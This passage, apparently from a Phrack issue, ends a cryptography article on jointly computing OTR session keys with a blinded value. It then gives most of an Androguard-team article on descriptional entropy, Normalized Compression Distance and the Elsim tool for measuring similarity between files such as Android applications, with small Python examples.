Note that the observing party cannot compute g^abo directly, because Alice's
value is "blinded" with j. Alice cannot compute it either; she doesn't know o.
The observing party however can compute g^(abo+jo) by raising Alice's value
to o. Alice can compute g^jo and also g^-jo, because she knows j. If
|
|
Alice would send g^-jo to O, then O could compute
|
|
|
|
g^(abo+jo) * g^-jo = g^abo
|
|
|
|
This is only one modular multiplication. So instead of doing a whole
|
|
modular exponentiation, the circuit that Alice and the observing party
|
|
jointly compute does roughly the following:
|
|
|
|
C(o, a) = derive_keys(o*a)
|
|
|
|
Where the function derive_keys() is the OTR key derivation function
|
|
(hashing the common key in different ways to generate symmetric key
|
|
material), O's input value will look like g^(abo+jo) and A's input value
|
|
will look like g^-jo.
|
|
|
|
All the symmetric operations (hashes and block ciphers) should probably be
|
|
implemented as circuits, for instance using Fairplay. Both SFE schemes
|
|
(circuits and homomorphic crypto) can be combined using the TASTY approach.
|
|
|
|
--[ 5 - References
|
|
|
|
[1] http://www-ee.stanford.edu/~hellman/publications/24.pdf
|
|
[2] http://www.cypherpunks.ca/otr/Protocol-v2-3.0.0.html
|
|
[3] http://eprint.iacr.org/2004/175.pdf
|
|
[4] http://www.jbonneau.com/OTR_analysis.pdf
|
|
[5] http://eprint.iacr.org/2010/365.pdf
|
|
[6] http://www.pinkas.net/PAPERS/MNPS.pdf
|
|
[7] http://tinyurl.com/84z7wpu
|
|
|
|
--[ 6 - Greetingz
|
|
|
|
First of all I have to give a big shout to bruhns, who developed this stuff
|
|
together with me! There's this one person whom I'd like to thank for
everything (and that's quite a lot). Unfortunately, I cannot name this
|
|
person here. 291646a6d004d800b1bc61ba945c9cb46422f8ac. Also a big thanks to
|
|
Phrack staff for reading through all this and supplying me with real
|
|
helpful feedback!
|
|
|
|
Greetingz go out to the following awesome people in no particular order:
|
|
ths, fabs, joern, nowin, trapflag, jenny, twice#11
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0f of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------=[ Similarities for Fun & Profit ]=------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------=[ Pouik (Androguard Team) and G0rfi3ld ]=--------------=|
|
|
|=------------------=[ d@t0t0.fr / g0rfi3ld@gmail.com ]=-----------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
1/ Introduction
|
|
1.1 Complexity of a sequence
|
|
1.2 Histograms and classical Shannon Entropy
|
|
1.3 From the Classical Entropy towards Descriptional Entropy
|
|
1.4 Normalized Compression Distance (NCD)
|
|
2/ Similarities
|
|
2.1 Between two sets of elements
|
|
2.2 In a set of elements
|
|
3/ Real World: Android
|
|
3.1 Similarities between two applications
|
|
3.2 Differences between two applications
|
|
3.3 Looking for a signature in applications
|
|
4/ Conclusion
|
|
5/ References
|
|
6/ Code
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
How can we verify that two numerical objects are identical? It's easy, you
|
|
just have to compare all characters, one by one. But how can we say that
|
|
two numerical objects are "similar" but not identical?
|
|
|
|
Can we define a measure of "similarity", which will give ipso facto a
|
|
measure of "dissimilarity"?
|
|
|
|
But what are these numerical files that we want to analyze or compare? It
|
|
could be anything, from pictures to numerical data files. We will focus in
|
|
this work on goodware and malware, (a goodware is not a malware :). So, if
|
|
the numerical objects are software, can we define a measure of similarity
|
|
and how? And why? We will see this.
|
|
|
|
Our problem can be simply defined as: How can we choose quickly, from a set
|
|
M of known software files {m1, ..., mn}, with n >= 1, the subset of the
|
|
files of M that are the "most similar" to a target A? And how can we find
|
|
quickly interesting differences without using a direct approach like graph
|
|
isomorphism [21, 25] between two similar but different applications?
|
|
|
|
We will show you how we can use a filtering tactic to select the best (i.e.
|
|
the "most similar" to a target A) files out of the malware set M. We
|
|
propose the use of two different tactics, using the entropy as a first
|
|
filtering tactic to filter the set M and the Normalized Compression
|
|
Distance (NCD) for a second filtering tactic. We also propose a new entropy
|
|
which is a simple generalization of the classical Shannon entropy. We call
|
|
this entropy the "descriptional entropy", which to the authors' knowledge,
|
|
is presented here for the first time.
|
|
|
|
While the tools that we present here are truly generic, i.e. they can be
|
|
used with any files, we will give some examples through the analysis and
|
|
comparison of Android applications.
|
|
|
|
----[ 1.1 Complexity of a sequence
|
|
|
|
We want to compare DNA sequences [24], music files or pictures [20].
|
|
We need a notion of the "complexity" of a sequence, to be able to compare
|
|
them, to sort them or to index them. But what is a complex sequence or how
|
|
do we define a complex sequence? There are lots of situations where we need
|
|
a tool to answer. To be more exact, we need a computable measure of the
|
|
complexity of a sequence, to index for example a set of files. The sequence
|
|
can be the bytes of a picture, a DNA sequence, a source code or an
|
|
executable file; in other words, whatever can be stored in a file. In this
|
|
paper, we will say sequence, for any sequence of ASCII characters.
|
|
|
|
So, can we define the "complexity" of a sequence? Let us give a toy
|
|
example, we consider the four sequences:
|
|
|
|
- S1 = "aaabbb"
|
|
- S2 = "ababab"
|
|
- S3 = "bbbaaa"
|
|
- S4 = "abbaab"
|
|
|
|
Intuition tells us that:
|
|
|
|
- S1 and S3 are more similar than S1 and S2 or S2 and S3.
|
|
- S1 is more "simple" than S2.
|
|
- S1, S2 and S3 are more "simple" than S4.
|
|
|
|
It is easy to see that S1 is the reverse of S3, so it could be interesting
|
|
for any function Comp() defined as a measure of the complexity of a
|
|
sequence to verify that Comp(S1) = Comp(S3).
|
|
|
|
----[ 1.2 Histograms and classical Shannon Entropy
|
|
|
|
Let S be a sequence of characters, with an "alphabet" of n different
|
|
symbols (generally characters). Let pi be the computed probability of
|
|
occurrence of each of the n characters in S, we will call the histogram
|
|
vector Hist = {p1, ..., pn} and then the classical Shannon entropy of the
|
|
sequence S is defined by:
|
|
|
|
n
|
|
__
|
|
\
|
|
H(S)= - / pi log(pi)
|
|
|__
|
|
i=1
|
|
|
|
(where log(x) denotes the logarithm; we use base 2 here, so the entropy is measured in bits).
|
|
|
|
In our toy example, S1 = "aaabbb", S2 = "ababab" and S3 = "bbbaaa", the
|
|
alphabet is {"a", "b"}. They have a same histogram vector entropy:
|
|
|
|
Hist(S1) = Hist(S2) = Hist(S3) = {1/2, 1/2}
|
|
|
|
which will give the same entropy:
|
|
|
|
H(S1) = H(S2) = H(S3) = 1.
|
|
|
|
If we use the classical Shannon entropy H(), the equation holds as
|
|
H(S1) = H(S3). However we also have H(S1) = H(S2) which contradicts 'S1 is
|
|
more simple than S2'. So the function is not suitable.
|
|
|
|
Let's see another problem with the classical Shannon entropy: if S is a
|
|
sequence of characters with S...S a concatenation of S and H() the Shannon
|
|
entropy, then we have H(S) = H(SS) = H(SSS) = H(S...S). This is not really
|
|
good for our purposes!
|
|
|
|
We will see that we can do better with a generalization of the Shannon
|
|
entropy which we will call "Descriptional Entropy".
|
|
|
|
----[ 1.3 From the Classical Shannon Entropy towards the Descriptional
|
|
Entropy
|
|
|
|
A lot of ways to measure the complexity of a sequence have been proposed.
|
|
For example, the Lempel-Ziv complexity [29,30] is defined as the number of
|
|
different subsequences (patterns) in a sequence when we apply the LZ
|
|
algorithm.
|
|
|
|
The sequence complexity, or the complexity index, of a sequence S = s1...sn
|
|
is defined as the number of different subsequences in S [31,32].
|
|
|
|
In all cases we obtain a number which is difficult to use, or we have to
|
|
take the histogram vector. But to compare two histogram vectors of unequal
|
|
size is not easy. We propose here a new approach.
|
|
|
|
Given a complexity measure based on the count of different subsequences,
|
|
and if we have N different subsequences, we can compute the histogram
vector Hist(S) = {P1, ..., PN} for this set, where Pi is the number of
occurrences of the i-th distinct subsequence divided by the total number of
subsequence occurrences, so that P1+...+PN=1 of course. So
|
|
now we can compute the entropy of this histogram vector; we propose to call
|
|
this entropy the "Descriptional Entropy" of a sequence:
|
|
|
|
N
|
|
__
|
|
\
|
|
Hd(Hist(S))= - / Pi log(Pi)
|
|
|__
|
|
i=1
|
|
|
|
To simplify we will write Hd(S) for Hd(Hist(S)). From now we will use the
|
|
log2(x) function, i.e. the log base 2 function.
|
|
|
|
Let us show it with the toy example, again, S1 = "aaabbb", S2 = "ababab",
|
|
S3 = "bbbaaa" and S4 = "abbaab". If we choose to count all different
|
|
subsequences we will have (to simplify we neglect the "empty" sequence
|
|
which is used sometimes):
|
|
|
|
(1) For S1 = "aaabbb": the subsequence set is (in alphabetical order)
|
|
|
|
{a,aa,aaa,aaab,aaabb,aaabbb,aab,aabb,aabbb,ab,abb,abbb,b,bb,bbb}
|
|
|
|
and the histogram vector:
|
|
Hist(S1)={1/7,2/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,
|
|
1/7,2/21,1/21}.
|
|
|
|
If we sort it we have:
|
|
{1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,2/21,2/21,
|
|
1/7,1/7}
|
|
|
|
and so the descriptional entropy will be (remember: we use the base 2
|
|
logarithmic function log2(x)):
|
|
Hd(S1) = - ( 1/21 log2(1/21) x 11 + 2/21 log2(2/21) x 2 + 1/7 log2(1/7)
|
|
x 2 )
|
|
Hd(S1) = 11/21 log2(21) + 4/21 log2(21/2) + 2/7 log2(7)
|
|
Hd(S1) = 11/21 log2(21) + 4/21 log2(21) - 4/21 log2(2) + 2/7 log2(7)
|
|
Hd(S1) = 5/7 log2(21) - 4/21 log2(2) + 2/7 log2(7)
|
|
|
|
which gives:
|
|
Hd(S1) = 3.74899
|
|
|
|
|
|
(2) For S2 = "ababab": the subsequence set is (in alphabetical order):
|
|
|
|
{a,ab,aba,abab,ababa,ababab,b,ba,bab,baba,babab}
|
|
|
|
and the histogram vector:
|
|
Hist(S2)= {1/7,1/7,2/21,2/21,1/21,1/21,1/7,2/21,2/21,1/21,1/21}
|
|
|
|
If we sort it we have:
|
|
{1/21,1/21,1/21,1/21,2/21,2/21,2/21,2/21,1/7,1/7,1/7}
|
|
|
|
and the descriptional entropy will be:
|
|
Hd(S2) = 3 log2(7) / 7 + 8 log2(21/2) / 21 + 4 log2(21) / 21
|
|
|
|
which gives:
|
|
Hd(S2) = 3.3321
|
|
|
|
(3) For S3 = "bbbaaa": the subsequence set is (in alphabetical order)
|
|
|
|
{a,aa,aaa,b,ba,baa,baaa,bb,bba,bbaa,bbaaa,bbb,bbba,bbbaa,bbbaaa}
|
|
|
|
and the histogram vector:
|
|
Hist(S3)={1/7,2/21,1/21,1/7,1/21,1/21,1/21,2/21,1/21,1/21,1/21,
|
|
1/21,1/21,1/21,1/21}
|
|
|
|
If components are sorted we have:
|
|
{1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,2/21,2/21,
|
|
1/7,1/7}
|
|
|
|
and the descriptional entropy will be:
|
|
Hd(S3) = 2 log2(7)/7 + 4 log2(21/2)/21 + 11 log2(21)/21
|
|
|
|
which gives:
|
|
Hd(S3) = 3.74899
|
|
|
|
(4) For S4 = "abbaab": the subsequence set is (in alphabetical order)
|
|
|
|
{a,aa,aab,ab,abb,abba,abbaa,abbaab,b,ba,baa,baab,bb,bba,bbaa,bbaab}
|
|
|
|
and the histogram vector:
|
|
Hist(S4) = {1/7,1/21,1/21,2/21,1/21,1/21,1/21,1/21,1/7,1/21,
|
|
1/21,1/21,1/21,1/21,1/21,1/21}
|
|
|
|
|
|
If components are sorted we have:
|
|
{1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,
|
|
2/21,1/7,1/7}
|
|
|
|
and the descriptional entropy will be:
|
|
Hd(S4) = 2 log2(7) / 7 + 2 log2(21/2) / 21 + 13 log2(21) / 21
|
|
|
|
which gives:
|
|
Hd(S4) = 3.84423
|
|
|
|
So, we have:
|
|
|
|
Hd(S2) = 3.3321 < Hd(S1) = Hd(S3) = 3.74899 < Hd(S4) = 3.84423.
|
|
|
|
The result Hd(S1) = Hd(S3) = 3.74899 is expected. However, the result
|
|
Hd(S2) = 3.3321 < Hd(S1) is a little bit surprising, but the whole set of
|
|
inequalities is correct. S4 is more "complex" than S1, S2 and S3.
|
|
|
|
Let us give another simple example, if we choose S5 = "bbbbbaaaaa" and
|
|
S6 = S5S5 = "bbbbbaaaaabbbbbaaaaa". We will have:
|
|
|
|
Hd(S5) = 4.82265 and Hd(S6) = 6.68825,
|
|
|
|
and it is not so difficult to prove that:
|
|
|
|
for any sequence S:
|
|
Hd(S) < Hd(SS) < Hd(SSS) < Hd(S......S).
|
|
|
|
This sounds good :)
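
A small Python implementation of Hd (plus the classical Shannon entropy H
for comparison) reproduces the toy values above. This is the naive
all-substrings version, not an optimized one:

###########################################
import math
from collections import Counter

def H(hist):
    total = float(sum(hist.values()))
    return -sum(c / total * math.log(c / total, 2) for c in hist.values())

def shannon(s):          # classical entropy over the character histogram
    return H(Counter(s))

def descriptional(s):    # Hd: entropy over the histogram of all substrings
    return H(Counter(s[i:j] for i in range(len(s))
                            for j in range(i + 1, len(s) + 1)))

for s in ("aaabbb", "ababab", "bbbaaa", "abbaab"):
    print(s, round(shannon(s), 5), round(descriptional(s), 5))
# -> H = 1.0 for all four, Hd = 3.74899, 3.3321, 3.74899, 3.84423
print(round(descriptional("bbbbbaaaaa"), 5),
      round(descriptional("bbbbbaaaaa" * 2), 5))
# -> the S5/S6 values from above; note that shannon(S) == shannon(S + S)
###########################################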
|
|
|
|
However there is a drawback since for a very long sequence S the
|
|
(practical) computational complexity of the computation of Hd(S) is not
|
|
cheap. Well, it's true, of course. We could probably find a fast(er)
|
|
algorithm, based for example on some variation of the Aho-Corasick,
|
|
Boyer-Moore or Knuth-Morris-Pratt algorithms. We can also say that we only
|
|
consider subsequences of length bounded by a suitable integer k.
|
|
|
|
----[ 1.4 Normalized Compression Distance (NCD)
|
|
|
|
The Kolmogorov complexity is a very interesting concept and it has a lot of
|
|
applications [18,23]. We present here this concept to explain the power of
|
|
Normalized Compression Distance (NCD).
|
|
|
|
Let us cite Wikipedia [26]: "In algorithmic information theory (a subfield
|
|
of computer science), the Kolmogorov complexity of an object, such as a
|
|
piece of text, is a measure of the computational resources needed to
|
|
specify the object. It is named after Soviet Russian mathematician Andrey
|
|
Kolmogorov. Kolmogorov complexity is also known as descriptive complexity,
|
|
Kolmogorov Chaitin complexity, algorithmic entropy, or program-size
|
|
complexity."
|
|
|
|
Well, it is a very good abstract. Unfortunately, the Kolmogorov complexity
|
|
K(S) of a sequence S is not computable, so we can just approximate it.
|
|
The use of any compression algorithm gives a trivial and evident upper
|
|
bound of K(S). Read the book [22] for a deep and modern presentation and
|
|
for applications. (Yes there are applications).
|
|
|
|
We switch now to the NCD, which is always computable.
|
|
|
|
To be able to use the Kolmogorov complexity we need to extend the
|
|
informational distance to have a normalized value which indicates the
|
|
similarities or dissimilarities between two elements/strings. Let us recall
|
|
what a distance is.
|
|
|
|
Wikipedia says: "...a distance function on a given set M is a
|
|
function d: MxM -> R, the set of real numbers, that
|
|
satisfies the following conditions:
|
|
|
|
a) d(x,y) >= 0, and d(x,y) = 0 if and only if x = y. (Distance is
|
|
positive between two different points, and is zero precisely from a
|
|
point to itself.)
|
|
b) It is symmetric: d(x,y) = d(y,x). (The distance between x and y is
|
|
the same in either direction.)
|
|
c) It satisfies the triangle inequality: d(x,z) <= d(x,y) + d(y,z).
|
|
(The distance between two points is the shortest distance along any
|
|
path).
|
|
|
|
Such a distance function is known as a metric."
|
|
|
|
Suppose we have two sequences x and y. We consider the concatenated
|
|
sequence xy, and a compressor algorithm Comp with L(Comp(S)) the length of
|
|
the compressed string, i.e. the number of bytes of the compressed string.
|
|
|
|
The main idea of the NCD [17,33] is that L(Comp(xy)) will be almost equal
|
|
to L(Comp(x)) if x = y, and L(Comp(xy)) will still be only slightly larger
than L(Comp(x)) if x and y are similar without being equal.
|
|
|
|
Let us give now the definition of dNCD(x,y):
|
|
|
|
|
|
(L(Comp(x|y)) - min{L(Comp(x)), L(Comp(y))})
|
|
- dNCD(x, y) = -------------------------------------------------
|
|
max{L(Comp(x)), L(Comp(y))}
|
|
|
|
|
|
This formula returns a value from 0.0 (maximally similar) to 1.0 (maximally
|
|
dissimilar). Well, 1.0 only if the compressor behaves correctly; in practice
the value can slightly overshoot these bounds, but we can manage this.
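
As a minimal, self-contained illustration of the formula, here is a Python
version using zlib as the compressor Comp; the exact values depend on the
compressor, only the relative ordering matters:

###########################################
import zlib

def C(data):
    return len(zlib.compress(data, 9))

def ncd(x, y):
    cx, cy = C(x), C(y)
    return (C(x + y) - min(cx, cy)) / float(max(cx, cy))

print(ncd(b"W00T W00T PHRACK", b"W00T W00T PHRACK"))        # identical: close to 0
print(ncd(b"W00T W00T PHRACK", b"W00T W00T PHRACK STAFF"))  # similar: a bit larger
print(ncd(b"W00T W00T PHRACK", b"HELLO WORLD"))             # dissimilar: larger still
###########################################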
|
|
|
|
--[ 2 - Similarities
|
|
|
|
In the next two sections, we will present two algorithms which can be used
|
|
with any set of elements. Elsim (included in the code archive at the end of
|
|
this paper) is our implementation of those algorithms. It is open source
|
|
software (LGPL), and with it you can compute similarities between any
|
|
"described" elements :)
|
|
|
|
----[ 2.1 Between 2 sets of elements
|
|
|
|
In this part we will describe how we can create a generic algorithm to
|
|
search the similarities between 2 sets of elements. This algorithm can be
|
|
used to compare all kind of elements if you are able to find a correct way
|
|
to represent your data.
|
|
|
|
For the comparison of our data, we will use the NCD, thus indirectly the
|
|
Kolmogorov complexity. One of the major drawbacks [16] of the compression
|
|
is the "time" required :) The tool can be powerful, but if you use a
|
|
compression algorithm like LZMA, you are limited to "hello world" problems
|
|
due to the speed of the compression. You need to choose carefully your
|
|
(lossless) compressor.
|
|
|
|
A compressor C is "normal" if the following properties (inequalities) are
|
|
satisfied [17]:
|
|
|
|
1) Idempotency: C(xx) = C(x), and C(E) = 0,
|
|
where E is the empty string.
|
|
2) Monotonicity: C(xy) >= C(x).
|
|
3) Symmetry: C(xy) = C(yx).
|
|
4) Distributivity: C(xy) + C(z) <= C(xz) + C(yz).
|
|
|
|
The important theorem from [18] reveals the power of the dNCD distance:
|
|
|
|
"if the compressor C is normal, then the dNCD is a normalized admissible
|
|
distance satisfying the metric inequalities that is, a similarity metric."
|
|
|
|
With this theorem, we can use the NCD as a simple tool to measure the
|
|
similarity between elements.
|
|
|
|
We have performed tests on different compressors to check them with respect to
|
|
both the previous properties and their speed. If the algorithm is too slow
|
|
it will be really useless for practical purposes. We chose to compress
|
|
random signatures (see 3.1) because it's close to our application domain
|
|
(see 3).
|
|
|
|
##########################################################################
|
|
Property | Number of successes | size of final compression | speed (seconds)
|
|
##########################################################################
|
|
d@t0t0:~/elsim$ ./tests/test_similarity.py
|
|
* LZMA
|
|
Idempotency 0/9 1167 1.82118797
|
|
Monotonicity 72/72 13258 9.40736294
|
|
Symetry 72/72 17380 9.32561111
|
|
Distributivity 504/504 214466 133.67427087
|
|
|
|
* BZ2
|
|
Idempotency 0/9 1947 0.00075889
|
|
Monotonicity 72/72 18248 0.00626206
|
|
Symetry 72/72 221744 0.00735211
|
|
Distributivity 504/504 279944 0.09816098
|
|
|
|
* ZLIB
|
|
Idempotency 0/9 1073 0.00033116
|
|
Monotonicity 72/72 11850 0.00224590
|
|
Symetry 72/72 15348 0.00276113
|
|
Distributivity 504/504 190386 0.03468490
|
|
|
|
* XZ
|
|
Idempotency 0/9 1900 0.55278206
|
|
Monotonicity 72/72 17544 4.41346812
|
|
Symetry 72/72 21008 4.35566306
|
|
Distributivity 504/504 269864 61.70975709
|
|
|
|
* VCBLOCKSORT
|
|
Idempotency 0/9 8129 0.00140786
|
|
Monotonicity 72/72 86960 0.01695490
|
|
Symetry 10/72 115168 0.02190304
|
|
Distributivity 504/504 1414896 0.21149492
|
|
|
|
* SNAPPY
|
|
Idempotency 0/9 1153 0.00009203
|
|
Monotonicity 72/72 12952 0.00057387
|
|
Symetry 72/72 17184 0.00059295
|
|
Distributivity 504/504 210952 0.01117182
|
|
###########################################################################
|
|
|
|
Snappy [19] is really fast and, like most of the other compressors, respects
the conditions. It is interesting to see that the first property
(idempotency) is never satisfied in practice: a real compressor never
achieves C(xx) = C(x) exactly, it only gets close to it, and those close
results are why the algorithm still works :).
|
|
|
|
It is possible to use the similarity library of Elsim independently, to
experiment with the Kolmogorov complexity (approximation) and the NCD:
|
|
|
|
###########################################
|
|
In [1]: from elsim.similarity import similarity
|
|
In [2]: s =
|
|
similarity.SIMILARITY("./elsim/similarity/libsimilarity/libsimilarity.so")
|
|
|
|
// change the type of compressor (bzip2)
|
|
In [3]: s.set_compress_type( similarity.BZ2_COMPRESS )
|
|
// Get the kolmogorov complexity (by using the compressor, so this function
|
|
// returns the length of the compression)
|
|
In [4]: s.kolmogorov("W00T W00T PHRACK")
|
|
Out[4]: (52L, 0)
|
|
|
|
// Get the similarity distance between two strings
|
|
In [5]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK")
|
|
Out[5]: (0.057692307978868484, 0)
|
|
In [6]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK STAFF")
|
|
Out[6]: (0.17543859779834747, 0)
|
|
In [7]: s.ncd("W00T W00T PHRACK", "HELLO WORLD")
|
|
Out[7]: (0.23076923191547394, 0)
|
|
// As you can see :
|
|
// - the elements of the first comparison are closer
|
|
// than the elements of the second comparison
|
|
// - the elements of the second comparison are closer
|
|
// than the elements of the third comparison
|
|
// - the result of the first comparison is not 0, that is why
|
|
// we don't respect the first property but practically it works
|
|
// because we are not far from 0
|
|
|
|
// change the type of compressor (Snappy)
|
|
In [8]: s.set_compress_type( similarity.SNAPPY_COMPRESS )
|
|
In [9]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK")
|
|
Out[9]: (0.6666666865348816, 0)
|
|
In [10]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK STAFF")
|
|
Out[10]: (0.6818181872367859, 0)
|
|
In [11]: s.ncd("W00T W00T PHRACK", "HELLO WORLD")
|
|
Out[11]: (0.7777777910232544, 0)
|
|
|
|
// As you can see, Snappy is very bad with such kind of strings, even if
|
|
// the algorithm respects the dissimilarities between the comparison.
|
|
|
|
// If we test this compressor with longer strings, and strings of
|
|
// signatures (3.1), we have better results:
|
|
In [12]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\
|
|
"B[GP1]",
|
|
"B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]B[GP1]")
|
|
Out[12]: (0.0784313753247261, 0)
|
|
|
|
In [13]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\
|
|
"B[GP1]",
|
|
"B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]")
|
|
Out[13]: (0.11764705926179886, 0)
|
|
|
|
In [14]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\
|
|
"B[GP1]",
|
|
"B[G]B[SGIGF0]B[RP1G]B[SP1I]B[SG]B[SSGP0]B[F1]B[P0SSGR]B[F1]"\
|
|
"B[SSSI]B[RF1P0R]B[GSP0RP0P0]B[GI]B[P1]B[I]B[GP1S]")
|
|
Out[14]: (0.9270833134651184, 0)
|
|
|
|
###########################################
|
|
|
|
Snappy may be the fastest algorithm but its compression ratio is the worst.
However, that is not particularly important: it is not a problem as long as
the properties are respected. Moreover, if you want a final value that better
reflects the idea of similarity, you can still switch to some
|
|
other compressor, such as ZLIB, LZMA or BZ2.
|
|
|
|
The first thing to do is to describe our "basic" element which will be used
|
|
for a comparison. An element is composed of:
|
|
- a string
|
|
- a hash
|
|
|
|
Oh wait, that's all? Yes, we need to compare strings and not other things.
|
|
But the strings themselves will highly depend on your similarity problem.
|
|
For example, if your problem is to compare two binaries, it's a bad idea to
|
|
compare the listings corresponding to a specific function. You need to find
|
|
the best way to transform your data into suitable strings, and it's
|
|
probably the most difficult part. Of course it is not our job in this
|
|
article :) It is not easy to transform your data into a string and it will be
|
|
specific to each problem. For example, if your data is a chemical molecule
|
|
you need probably to use SMILES to convert the structure to an ASCII string
|
|
[34].
|
|
|
|
Remember that you can't compare elements that easily, you really need a
|
|
transformation because the Kolmogorov complexity is not magical. Using it
|
|
requires the normalization of your data. Finally, the hash is only used to
|
|
quickly remove the identical elements.
|
|
|
|
The algorithm is the following one:
|
|
|
|
- input: A:set(), B:set()
|
|
where A and B are sets of elements
|
|
|
|
- output: I:set(), S:set(), N:set(), D:set(), Sk:set()
|
|
where I: identical elements, S: similar elements, N: new elements,
|
|
D: deleted elements, Sk: skipped elements
|
|
|
|
- Sk: Skipped elements by using a "filtering" function (helpful if we
|
|
wish to skip some elements from a set (small size, known element from
|
|
a library, etc.)
|
|
|
|
- Identify internal identical elements in each set
|
|
|
|
- I: Identify "identical" elements by the intersection of A and B
|
|
|
|
- Get all others elements by removing identical elements
|
|
|
|
- Perform the "NCD" between each element of A and B
|
|
|
|
- S: "Sort" all similarities elements by using a threshold
|
|
|
|
- N,D: Get all new/deleted elements if they are not present in one of
|
|
the previous sets
|
|
|
|
The following diagram describes this algorithm:
|
|
|
|
|
|
|--A--| |--B--|
|
|
| A1 | | B1 |
|
|
| A2 | | B2 |
|
|
| A3 | | B3 |
|
|
|--An-| |--Bn-|
|
|
| |---------| |
|
|
|- --->|FILTERING|<-----|
|
|
|---------|
|
|
| |
|
|
| |--------->|Sk|
|
|
|
|
|
| |---------|
|
|
|----->|IDENTICAL|------>|I|
|
|
|---------|
|
|
|
|
|
|
|
|
| |---|---use-->|Kolmogorov|
|
|
|---->|NCD|
|
|
|---|
|
|
|
|
|
|
|
|
|
|
|
| |---------|-->|Threshold|
|
|
|-------->| SORTING |
|
|
|---------|
|
|
|
|
|
|
|
|
/|\
|
|
/ | \
|
|
/ | \
|
|
/ | \
|
|
/ | \
|
|
/ | \
|
|
|N|<------------/ | \-------->|D|
|
|
|
|
|
|---->|S|
|
|
|
|
|
|
Moreover we can calculate a similarity "score" using the number of
|
|
identical elements and the value of the similar elements.
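
A bare-bones Python sketch of this comparison follows: no filtering step,
zlib instead of Snappy, a naive quadratic NCD loop, elements reduced to
their byte strings, and an arbitrary threshold. The real implementation
with all the bells and whistles is in the Elsim code archive.

###########################################
import hashlib, zlib

def C(d): return len(zlib.compress(d, 9))
def ncd(x, y): return (C(x + y) - min(C(x), C(y))) / float(max(C(x), C(y)))
def h(s): return hashlib.sha1(s).hexdigest()

def compare(A, B, threshold=0.3):
    # A, B: lists of byte strings (the "string" part of each element)
    ha, hb = set(h(x) for x in A), set(h(y) for y in B)
    identical = [x for x in A if h(x) in hb]
    left_a = [x for x in A if h(x) not in hb]
    left_b = [y for y in B if h(y) not in ha]
    similar, deleted, matched = [], [], set()
    for x in left_a:
        scored = sorted((ncd(x, y), i) for i, y in enumerate(left_b))
        if scored and scored[0][0] <= threshold:
            similar.append((x, left_b[scored[0][1]], scored[0][0]))
            matched.add(scored[0][1])
        else:
            deleted.append(x)          # in A but nothing close in B
    new = [y for i, y in enumerate(left_b) if i not in matched]
    return identical, similar, new, deleted
###########################################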
|
|
|
|
Here is a simple example showing you how it is possible to use the
|
|
algorithm (elsim_text.py). In this case, it's used to compare two plain
|
|
text files. We modified the COPYING.LESSER text by changing the order of
|
|
a few paragraphs and removing (or adding) words:
|
|
|
|
###########################################
|
|
ds@t0t0:~/elsim$ ./tests/example_text_sim.py -i
|
|
examples/text/COPYING.LESSER examples/text/COPYING.LESSER.MODIF_REORDER
|
|
Elements:
|
|
IDENTICAL: 106
|
|
SIMILAR: 2
|
|
NEW: 0
|
|
DELETED: 0
|
|
SKIPPED: 2
|
|
--> sentences: 99.783060% of similarities
|
|
###########################################
|
|
|
|
As you can see, despite a few modifications the two files are still reported
as almost identical, even if the elements are not at the same place. And if you add some
|
|
debugging information, you can see the two modified sentences:
|
|
|
|
###########################################
|
|
[...]
|
|
SIMILAR sentences:
|
|
138 'This version of the GNU Lesser General Public License
|
|
incorporates the terms and conditions of version 3 of the GNU
|
|
General Public License' --> 131 'This version of the GNU General
|
|
Public License incorporates the terms and conditions of version 3
|
|
of the GNU General Public License' 0.105263158679
|
|
71 'and the "GNU GPL" refers to version 3 of the GNU General Public
|
|
License' --> 76 'and the "GNU GPL HOOK" refers to version 3 of the
|
|
GNU General Public License' 0.129032254219
|
|
[...]
|
|
###########################################
|
|
|
|
----[ 2.2 In a set of elements
|
|
|
|
The previous algorithm is interesting in order to compare two elements, but
|
|
if you have more or if you wish to search for a specific signature in a set
|
|
of elements, it can be very slow. That's why we need to use a clustering
|
|
algorithm [28] to accelerate it.
|
|
|
|
So, an element will be defined by:
|
|
- a string (a signature),
|
|
- a set of float values.
|
|
|
|
The float values are classical feature vectors; we will use this set of
floats to perform the clustering (and you can use specific weights if
you think that some elements of the set are more important than others).
For example, if you consider that the first float value is more important
than the second one for the clustering, you can give it a higher weight.
|
|
|
|
In order to have more complex searches (i.e. if you wish to match multiple
|
|
elements at the same time or only a specific element and not another, etc.)
|
|
we will use a signature which will be composed of several elements and a
|
|
Boolean formula whose purpose is to check if a signature matches.
|
|
|
|
The algorithm is:
|
|
|
|
- Load signatures from the database and elements
|
|
|
|
- Execute a classical clustering [28] algorithm (kmeans [3] for
|
|
example) to reduce the number of comparisons by using the set of
|
|
float values
|
|
|
|
- For each cluster, compare the signatures loaded from the database
|
|
with the elements
|
|
|
|
- If the NCD value is below the threshold and if the Boolean
|
|
formula is true then we have found a valid signature (so we have
|
|
a valid match!)
|
|
|
|
|---SIGN---| |---ELEM---|
|
|
| X1 | | E1 |
|
|
| X2 | | E2 |
|
|
| X3 | | E3 |
|
|
|----Xn----| |----En----|
|
|
| |----------| |
|
|
